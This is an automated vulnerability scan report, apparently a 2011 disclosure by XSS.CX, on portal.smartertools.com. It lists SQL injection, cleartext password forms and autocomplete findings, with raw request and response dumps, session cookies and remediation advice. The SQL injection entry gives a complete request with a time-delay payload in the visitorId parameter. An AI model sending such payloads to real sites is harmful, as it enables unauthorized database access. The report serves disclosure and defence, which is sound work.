SQL Injection, portal.smartertools.com, Time Delay, CWE-89

CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Report generated by XSS.CX at Sat Mar 19 15:00:09 CDT 2011.


XSS.CX Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

XSS.CX Home | XSS.CX Research Blog
Loading

1. SQL injection

2. Cleartext submission of password

2.1. http://portal.smartertools.com/KB/a1571/could-not-load-type-telerikwebui.aspx

2.2. http://portal.smartertools.com/KB/browse.aspx

2.3. http://portal.smartertools.com/KB/search.aspx

2.4. http://portal.smartertools.com/Main/Default.aspx

2.5. http://portal.smartertools.com/Main/frmNewTicket.aspx

2.6. http://portal.smartertools.com/News/231/smartermail-804086-released.aspx

2.7. http://portal.smartertools.com/News/news.aspx

3. Password field with autocomplete enabled

3.1. http://portal.smartertools.com/KB/a1571/could-not-load-type-telerikwebui.aspx

3.2. http://portal.smartertools.com/KB/browse.aspx

3.3. http://portal.smartertools.com/KB/search.aspx

3.4. http://portal.smartertools.com/Main/Default.aspx

3.5. http://portal.smartertools.com/Main/frmNewTicket.aspx

3.6. http://portal.smartertools.com/Main/frmNewTicket.aspx

3.7. http://portal.smartertools.com/News/231/smartermail-804086-released.aspx

3.8. http://portal.smartertools.com/News/news.aspx

4. Cross-site scripting (reflected)

5. Cross-domain Referer leakage

6. Cookie without HttpOnly flag set

7. Email addresses disclosed

8. Robots.txt file

9. Content type incorrectly stated



1. SQL injection  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://portal.smartertools.com
Path:   /ST.ashx

Issue detail

The visitorId parameter appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the visitorId parameter. The application took 21372 milliseconds to respond to the request, compared with 1096 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

Request

GET /ST.ashx?PostID=1001976863&firstrun=true&sendactionscript=true&dt=Portal%20-%20SmarterTools%20Inc.&ref=&pp=http%3A%2F%2Fportal.smartertools.com%2FMain%2FDefault.aspx&tzo=300&visitorId=1dad4e31be764ea7b431d43fbac2942b'waitfor%20delay'0%3a0%3a20'--&interactId=SmarterInteractiveArea557253310 HTTP/1.1
Host: portal.smartertools.com
Proxy-Connection: keep-alive
Referer: http://portal.smartertools.com/Main/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: siteuidut=1dad4e31be764ea7b431d43fbac2942b; __utmz=134836083.1300551915.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASP.NET_SessionId=vsklln1iidg1dfncvlwk0ylv; __utma=134836083.1670938407.1300551915.1300551915.1300551915.1; __utmc=134836083; __utmb=134836083.3.10.1300551915; __utmz=61502381.1300551951.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=61502381.1558309378.1300551951.1300551951.1300551951.1; __utmc=61502381; __utmb=61502381.2.10.1300551951

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 19 Mar 2011 16:31:05 GMT
Content-Length: 0


2. Cleartext submission of password  previous  next
There are 7 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


2.1. http://portal.smartertools.com/KB/a1571/could-not-load-type-telerikwebui.aspx  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://portal.smartertools.com
Path:   /KB/a1571/could-not-load-type-telerikwebui.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /KB/a1571/could-not-load-type-telerikwebui.aspx HTTP/1.1
Host: portal.smartertools.com
Proxy-Connection: keep-alive
Referer: http://portal.smartertools.com/Main/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: siteuidut=1dad4e31be764ea7b431d43fbac2942b; __utmz=134836083.1300551915.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASP.NET_SessionId=vsklln1iidg1dfncvlwk0ylv; __utma=134836083.1670938407.1300551915.1300551915.1300551915.1; __utmc=134836083; __utmb=134836083.3.10.1300551915; __utmz=61502381.1300551951.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); uidut=6488571; __utma=61502381.1558309378.1300551951.1300551951.1300551951.1; __utmc=61502381; __utmb=61502381.4.10.1300551951

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
X-Powered-By: ASP.NET
Date: Sat, 19 Mar 2011 16:28:34 GMT
Content-Length: 18717


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_head1"><title>
...[SNIP]...
<body class="cEntry ltr" dir="ltr">
   <form enctype="" id="aspnetForm" method="post" name="aspnetForm" target="">
<div>
...[SNIP]...
</script>
   <input name="ctl00$MPH$CustomerLogin1$ctl01" type="password" size="20" id="ctl00_MPH_CustomerLogin1_ctl01" OnKeyPress="return EnterHandler(event, function(){ __doPostBack(&#39;LoginButton&#39;, &#39;&#39;); });" onkeydown="return ctl00_MPH_CustomerLogin1_ctl01_KeyPressHandler(event);" /></td>
...[SNIP]...

2.2. http://portal.smartertools.com/KB/browse.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://portal.smartertools.com
Path:   /KB/browse.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /KB/browse.aspx HTTP/1.1
Host: portal.smartertools.com
Proxy-Connection: keep-alive
Referer: http://portal.smartertools.com/KB/a1571/could-not-load-type-telerikwebui.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: siteuidut=1dad4e31be764ea7b431d43fbac2942b; __utmz=134836083.1300551915.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASP.NET_SessionId=vsklln1iidg1dfncvlwk0ylv; __utmz=61502381.1300551951.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); uidut=6488571; __utma=61502381.1558309378.1300551951.1300551951.1300551951.1; __utmc=61502381; __utma=134836083.1670938407.1300551915.1300551915.1300554519.2; __utmc=134836083; __utmb=134836083.1.10.1300554519

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
X-Powered-By: ASP.NET
Date: Sat, 19 Mar 2011 17:09:31 GMT
Content-Length: 15215


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_head1"><title>
...[SNIP]...
<body class="cEntry ltr" dir="ltr">
   <form enctype="" id="aspnetForm" method="post" name="aspnetForm" target="">
<div>
...[SNIP]...
</script>
   <input name="ctl00$MPH$CustomerLogin1$ctl01" type="password" size="20" id="ctl00_MPH_CustomerLogin1_ctl01" OnKeyPress="return EnterHandler(event, function(){ __doPostBack(&#39;LoginButton&#39;, &#39;&#39;); });" onkeydown="return ctl00_MPH_CustomerLogin1_ctl01_KeyPressHandler(event);" /></td>
...[SNIP]...

2.3. http://portal.smartertools.com/KB/search.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://portal.smartertools.com
Path:   /KB/search.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /KB/search.aspx HTTP/1.1
Host: portal.smartertools.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: siteuidut=1dad4e31be764ea7b431d43fbac2942b; __utmz=134836083.1300551915.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=61502381.1300551951.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); uidut=6488571; __utma=134836083.1670938407.1300551915.1300551915.1300554519.2; ASP.NET_SessionId=be50u4iwall2tqwy1zlcdpv4; __utma=61502381.1558309378.1300551951.1300554580.1300557309.3; __utmc=61502381; __utmb=61502381.1.10.1300557309

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
X-Powered-By: ASP.NET
Date: Sat, 19 Mar 2011 17:55:02 GMT
Content-Length: 15666


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_head1"><title>
...[SNIP]...
<body class="cEntry ltr" dir="ltr">
   <form enctype="" id="aspnetForm" method="post" name="aspnetForm" target="">
<div>
...[SNIP]...
</script>
   <input name="ctl00$MPH$CustomerLogin1$ctl01" type="password" size="20" id="ctl00_MPH_CustomerLogin1_ctl01" OnKeyPress="return EnterHandler(event, function(){ __doPostBack(&#39;LoginButton&#39;, &#39;&#39;); });" onkeydown="return ctl00_MPH_CustomerLogin1_ctl01_KeyPressHandler(event);" /></td>
...[SNIP]...

2.4. http://portal.smartertools.com/Main/Default.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://portal.smartertools.com
Path:   /Main/Default.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /Main/Default.aspx HTTP/1.1
Host: portal.smartertools.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: siteuidut=1dad4e31be764ea7b431d43fbac2942b; __utmz=134836083.1300551915.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASP.NET_SessionId=vsklln1iidg1dfncvlwk0ylv; __utma=134836083.1670938407.1300551915.1300551915.1300551915.1; __utmc=134836083; __utmb=134836083.3.10.1300551915

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
X-Powered-By: ASP.NET
Date: Sat, 19 Mar 2011 16:25:41 GMT
Content-Length: 21875


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_head1"><title>
...[SNIP]...
<body class="cEntry ltr" dir="ltr">
   <form name="aspnetForm" method="post" action="Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
</script>
   <input name="ctl00$MPH$CustomerLogin1$ctl01" type="password" size="20" id="ctl00_MPH_CustomerLogin1_ctl01" OnKeyPress="return EnterHandler(event, function(){ __doPostBack(&#39;LoginButton&#39;, &#39;&#39;); });" onkeydown="return ctl00_MPH_CustomerLogin1_ctl01_KeyPressHandler(event);" /></td>
...[SNIP]...

2.5. http://portal.smartertools.com/Main/frmNewTicket.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://portal.smartertools.com
Path:   /Main/frmNewTicket.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /Main/frmNewTicket.aspx?InstanceID=82323b12-758c-41d2-a388-cbaf396f28d1 HTTP/1.1
Host: portal.smartertools.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: siteuidut=1dad4e31be764ea7b431d43fbac2942b; __utmz=134836083.1300551915.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASP.NET_SessionId=vsklln1iidg1dfncvlwk0ylv; __utma=134836083.1670938407.1300551915.1300551915.1300551915.1; __utmc=134836083; __utmb=134836083.3.10.1300551915

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
X-Powered-By: ASP.NET
Date: Sat, 19 Mar 2011 16:25:43 GMT
Content-Length: 13463


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_head1"><title>
...[SNIP]...
<body class="cEntry ltr" dir="ltr">
   <form name="aspnetForm" method="post" action="frmNewTicket.aspx?InstanceID=82323b12-758c-41d2-a388-cbaf396f28d1" id="aspnetForm">
<div>
...[SNIP]...
</script>
   <input name="ctl00$MPH$CustomerLogin1$ctl01" type="password" size="20" id="ctl00_MPH_CustomerLogin1_ctl01" OnKeyPress="return EnterHandler(event, function(){ __doPostBack(&#39;LoginButton&#39;, &#39;&#39;); });" onkeydown="return ctl00_MPH_CustomerLogin1_ctl01_KeyPressHandler(event);" /></td>
...[SNIP]...

2.6. http://portal.smartertools.com/News/231/smartermail-804086-released.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://portal.smartertools.com
Path:   /News/231/smartermail-804086-released.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /News/231/smartermail-804086-released.aspx HTTP/1.1
Host: portal.smartertools.com
Proxy-Connection: keep-alive
Referer: http://portal.smartertools.com/Main/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: siteuidut=1dad4e31be764ea7b431d43fbac2942b; __utmz=134836083.1300551915.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASP.NET_SessionId=vsklln1iidg1dfncvlwk0ylv; __utma=134836083.1670938407.1300551915.1300551915.1300551915.1; __utmc=134836083; __utmb=134836083.3.10.1300551915; __utmz=61502381.1300551951.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=61502381.1558309378.1300551951.1300551951.1300551951.1; __utmc=61502381; __utmb=61502381.2.10.1300551951

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Set-Cookie: uidut=6488571; expires=Tue, 19-Mar-2041 16:27:02 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Sat, 19 Mar 2011 16:27:01 GMT
Content-Length: 15639


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_head1"><title>
...[SNIP]...
<body class="cEntry ltr" dir="ltr">
   <form enctype="" id="aspnetForm" method="post" name="aspnetForm" target="">
<div>
...[SNIP]...
</script>
   <input name="ctl00$MPH$CustomerLogin1$ctl01" type="password" size="20" id="ctl00_MPH_CustomerLogin1_ctl01" OnKeyPress="return EnterHandler(event, function(){ __doPostBack(&#39;LoginButton&#39;, &#39;&#39;); });" onkeydown="return ctl00_MPH_CustomerLogin1_ctl01_KeyPressHandler(event);" /></td>
...[SNIP]...

2.7. http://portal.smartertools.com/News/news.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://portal.smartertools.com
Path:   /News/news.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /News/news.aspx HTTP/1.1
Host: portal.smartertools.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: siteuidut=1dad4e31be764ea7b431d43fbac2942b; __utmz=134836083.1300551915.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=61502381.1300551951.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); uidut=6488571; __utma=134836083.1670938407.1300551915.1300551915.1300554519.2; ASP.NET_SessionId=be50u4iwall2tqwy1zlcdpv4; __utma=61502381.1558309378.1300551951.1300554580.1300557309.3; __utmc=61502381; __utmb=61502381.3.10.1300557309

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
X-Powered-By: ASP.NET
Date: Sat, 19 Mar 2011 17:55:03 GMT
Content-Length: 21211


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_head1"><title>
...[SNIP]...
<body class="cEntry ltr" dir="ltr">
   <form enctype="" id="aspnetForm" method="post" name="aspnetForm" target="">
<div>
...[SNIP]...
</script>
   <input name="ctl00$MPH$CustomerLogin1$ctl01" type="password" size="20" id="ctl00_MPH_CustomerLogin1_ctl01" OnKeyPress="return EnterHandler(event, function(){ __doPostBack(&#39;LoginButton&#39;, &#39;&#39;); });" onkeydown="return ctl00_MPH_CustomerLogin1_ctl01_KeyPressHandler(event);" /></td>
...[SNIP]...

3. Password field with autocomplete enabled  previous  next
There are 8 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


3.1. http://portal.smartertools.com/KB/a1571/could-not-load-type-telerikwebui.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://portal.smartertools.com
Path:   /KB/a1571/could-not-load-type-telerikwebui.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /KB/a1571/could-not-load-type-telerikwebui.aspx HTTP/1.1
Host: portal.smartertools.com
Proxy-Connection: keep-alive
Referer: http://portal.smartertools.com/Main/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: siteuidut=1dad4e31be764ea7b431d43fbac2942b; __utmz=134836083.1300551915.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASP.NET_SessionId=vsklln1iidg1dfncvlwk0ylv; __utma=134836083.1670938407.1300551915.1300551915.1300551915.1; __utmc=134836083; __utmb=134836083.3.10.1300551915; __utmz=61502381.1300551951.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); uidut=6488571; __utma=61502381.1558309378.1300551951.1300551951.1300551951.1; __utmc=61502381; __utmb=61502381.4.10.1300551951

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
X-Powered-By: ASP.NET
Date: Sat, 19 Mar 2011 16:28:34 GMT
Content-Length: 18717


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_head1"><title>
...[SNIP]...
<body class="cEntry ltr" dir="ltr">
   <form enctype="" id="aspnetForm" method="post" name="aspnetForm" target="">
<div>
...[SNIP]...
</script>
   <input name="ctl00$MPH$CustomerLogin1$ctl01" type="password" size="20" id="ctl00_MPH_CustomerLogin1_ctl01" OnKeyPress="return EnterHandler(event, function(){ __doPostBack(&#39;LoginButton&#39;, &#39;&#39;); });" onkeydown="return ctl00_MPH_CustomerLogin1_ctl01_KeyPressHandler(event);" /></td>
...[SNIP]...

3.2. http://portal.smartertools.com/KB/browse.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://portal.smartertools.com
Path:   /KB/browse.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /KB/browse.aspx HTTP/1.1
Host: portal.smartertools.com
Proxy-Connection: keep-alive
Referer: http://portal.smartertools.com/KB/a1571/could-not-load-type-telerikwebui.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: siteuidut=1dad4e31be764ea7b431d43fbac2942b; __utmz=134836083.1300551915.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASP.NET_SessionId=vsklln1iidg1dfncvlwk0ylv; __utmz=61502381.1300551951.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); uidut=6488571; __utma=61502381.1558309378.1300551951.1300551951.1300551951.1; __utmc=61502381; __utma=134836083.1670938407.1300551915.1300551915.1300554519.2; __utmc=134836083; __utmb=134836083.1.10.1300554519

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
X-Powered-By: ASP.NET
Date: Sat, 19 Mar 2011 17:09:31 GMT
Content-Length: 15215


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_head1"><title>
...[SNIP]...
<body class="cEntry ltr" dir="ltr">
   <form enctype="" id="aspnetForm" method="post" name="aspnetForm" target="">
<div>
...[SNIP]...
</script>
   <input name="ctl00$MPH$CustomerLogin1$ctl01" type="password" size="20" id="ctl00_MPH_CustomerLogin1_ctl01" OnKeyPress="return EnterHandler(event, function(){ __doPostBack(&#39;LoginButton&#39;, &#39;&#39;); });" onkeydown="return ctl00_MPH_CustomerLogin1_ctl01_KeyPressHandler(event);" /></td>
...[SNIP]...

3.3. http://portal.smartertools.com/KB/search.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://portal.smartertools.com
Path:   /KB/search.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /KB/search.aspx HTTP/1.1
Host: portal.smartertools.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: siteuidut=1dad4e31be764ea7b431d43fbac2942b; __utmz=134836083.1300551915.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=61502381.1300551951.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); uidut=6488571; __utma=134836083.1670938407.1300551915.1300551915.1300554519.2; ASP.NET_SessionId=be50u4iwall2tqwy1zlcdpv4; __utma=61502381.1558309378.1300551951.1300554580.1300557309.3; __utmc=61502381; __utmb=61502381.1.10.1300557309

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
X-Powered-By: ASP.NET
Date: Sat, 19 Mar 2011 17:55:02 GMT
Content-Length: 15666


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_head1"><title>
...[SNIP]...
<body class="cEntry ltr" dir="ltr">
   <form enctype="" id="aspnetForm" method="post" name="aspnetForm" target="">
<div>
...[SNIP]...
</script>
   <input name="ctl00$MPH$CustomerLogin1$ctl01" type="password" size="20" id="ctl00_MPH_CustomerLogin1_ctl01" OnKeyPress="return EnterHandler(event, function(){ __doPostBack(&#39;LoginButton&#39;, &#39;&#39;); });" onkeydown="return ctl00_MPH_CustomerLogin1_ctl01_KeyPressHandler(event);" /></td>
...[SNIP]...

3.4. http://portal.smartertools.com/Main/Default.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://portal.smartertools.com
Path:   /Main/Default.aspx

Issue detail

